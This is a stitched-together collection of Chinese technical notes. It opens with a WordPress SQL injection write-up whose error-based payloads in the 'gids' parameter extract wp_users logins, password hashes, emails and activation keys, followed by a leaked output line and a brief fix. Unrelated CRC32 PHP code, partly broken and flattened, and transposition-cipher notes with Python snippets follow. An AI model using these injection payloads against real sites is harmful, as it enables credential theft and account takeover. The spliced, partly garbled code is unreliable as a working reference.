POST action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select distinct table_schema from information_schema.tables limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
使用同样的方法可以注入得到 wp_users 表里面的数据。注入 wp_users 表中的数据:
action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select concat(id,user_login,user_pass,0x20,user_status,0x20,user_nicename,0x20,user_email,0x20,user_activation_key) from wordpress.wp_users limit 1,1 ),floor(rand(0)*2))x from information_schema.tables group by x)a)#
action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select concat(id,user_email,0x20,hex(user_activation_key),0x20) from wordpress.wp_users limit 0,1 ),floor(rand(0)*2))x from information_schema.tables group by x)a)#
获得数据(查询结果被拼接进数据库的重复键报错信息中回显出来): Error: Duplicate entry '1sycweb3@163.com 7136775859785A39716B74765968674567563950 1' for key 'group_key'
由于数据是经由报错信息泄露的,服务端不应把数据库错误原样输出给客户端,并应对 gids 参数做严格校验、使用参数化查询。
//reflection in 32 bits of crc32 polynomial 0x04C11DB7 $poly_reflected=0xEDB88320;
//=0xFFFFFFFF; //keep track of register value after each call static $reg=0xFFFFFFFF;
//initialize register on first call if($first_call) $reg=0xFFFFFFFF;
$n=strlen($str); $zeros=$n<4 ? $n : 4;
//xor first $zeros=min(4,strlen($str)) bytes into the register for($i=0;$i<$zeros;$i++) $reg^=ord($str{$i})<<$i*8;
//now for the rest of the string for($i=4;$i<$n;$i++){ $next_char=ord($str{$i}); for($j=0;$j<8;$j++) $reg=(($reg>>1&0x7FFFFFFF)|($next_char>>$j&1)<<0x1F) ^($reg&1)*$poly_reflected; }
//put in enough zeros at the end for($i=0;$i<$zeros*8;$i++) $reg=($reg>>1&0x7FFFFFFF)^($reg&1)*$poly_reflected;
echo'$reg:'.$reg."<br />"; //xor the register with 0xFFFFFFFF return ~$reg; }
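/**
 * Rewind the trailing zero-padding steps of a bit-by-bit CRC-32 register.
 *
 * The input is complemented, stepped backwards $zeros * 8 times against the
 * reflected polynomial 0xEDB88320, and complemented again before it is
 * returned. Every call also echoes the rewound register as debug output.
 *
 * NOTE(review): $zeros comes from strlen($data). For an integer CRC that is
 * the number of characters in its decimal form, not the length of the
 * original message — confirm this is what callers expect.
 * NOTE(review): bits above bit 31 are never cleared in the set-bit branch, so
 * on a 64-bit build a $data whose complement does not fit in 32 bits carries
 * those bits into the result — confirm against the callers.
 *
 * @param int $data Final CRC value (presumably an integer; verify against callers).
 * @return int Complement of the rewound register.
 */
function bitbybit_crc32_reverse($data)
{
    // CRC-32 polynomial 0x04C11DB7 with its 32 bits reflected.
    $poly_reflected = 0xEDB88320;

    // Undo the final complement to recover the register value.
    $reg = ~$data;

    $n = strlen($data);
    $zeros = $n < 4 ? $n : 4;

    // Each pass inverts one shift-right / conditional-XOR step of the forward
    // routine: a set top bit means the polynomial was XORed in, which in turn
    // means the bit shifted out was 1.
    for ($i = 0; $i < $zeros * 8; $i++) {
        if (($reg >> 31) & 1) {
            $reg = ($reg) ^ $poly_reflected;
            $reg = ($reg << 1) | 1;
        } else {
            $reg = ($reg << 1) & 0xFFFFFFFE;
        }
    }

    // Debug output; single quotes keep '$reg:' as a literal label.
    echo '$reg:' . $reg . "<br />";

    // Complement the register again before returning it.
    return ~$reg;
}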
最简单的例子是栅栏密码,按照对角线的顺序写出明文,而按行的顺序读出作为密文。例如,用深度为2的栅栏技术加密信息“meet me after the toga party”,可写为
m e m a t r h t g p r y
 e t e f e t e o a a t
加密后的信息是 MEMATRHTGPRYETEFETEOAAT。这种技巧对密码分析者来说实在微不足道。一个更复杂的方案是把消息一行一行地写成矩形块,然后按列读出,但是把列的次序打乱。列的次序就是算法的密钥。例如(空格位置按后文 test() 中的密文还原,_ 表示空格):
密钥 4 3 1 2 5 6 7
明文 a t t a c k _
明文 p o s t p o n
明文 e _ u n t i l
明文 _ t w o _ x y
matrix = genMatrix(rows,cols) i = 0 row = 0 col = 0 for char in chars : row = i % rows col = key[i / rows] matrix[row][col] = char i = i + 1 for i in range(rows) : for j in range(cols): sys.stdout.write(str(matrix[i][j]))
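def test():
    """Decode the 28-character sample ciphertext with its known column key.

    Nothing is returned; the call to ``decode`` produces the output.
    """
    chars = 'tsuwatnoto tape cpt koix nly'
    # Column order as written for this sample (1-based): [4, 3, 1, 2, 5, 6, 7].
    # ``key`` is that permutation inverted and made 0-based: key[k] is the
    # position of k + 1 in the list above.
    key = [2, 3, 1, 0, 4, 5, 6]
    decode(chars, key)


def go():
    """Decode the contents of ``ciphertext.txt`` with a fixed column key.

    The file is read whole from the current working directory and passed to
    ``decode`` unchanged.
    """
    # Column order (1-based): [7, 6, 5, 2, 1, 3, 4]; ``key`` is its 0-based inverse.
    key = [4, 3, 5, 6, 2, 1, 0]
    # Earlier inline sample, kept for reference:
    # chars = 'pxh !ra o efpy s y i(amhrrfcafc es tixt u eatehsatiid ayefneha oe eid.or enn '
    # The context manager closes the handle even when read() raises; the
    # original left the file object open.
    with open('ciphertext.txt') as f:
        chars = f.read()
    decode(chars, key)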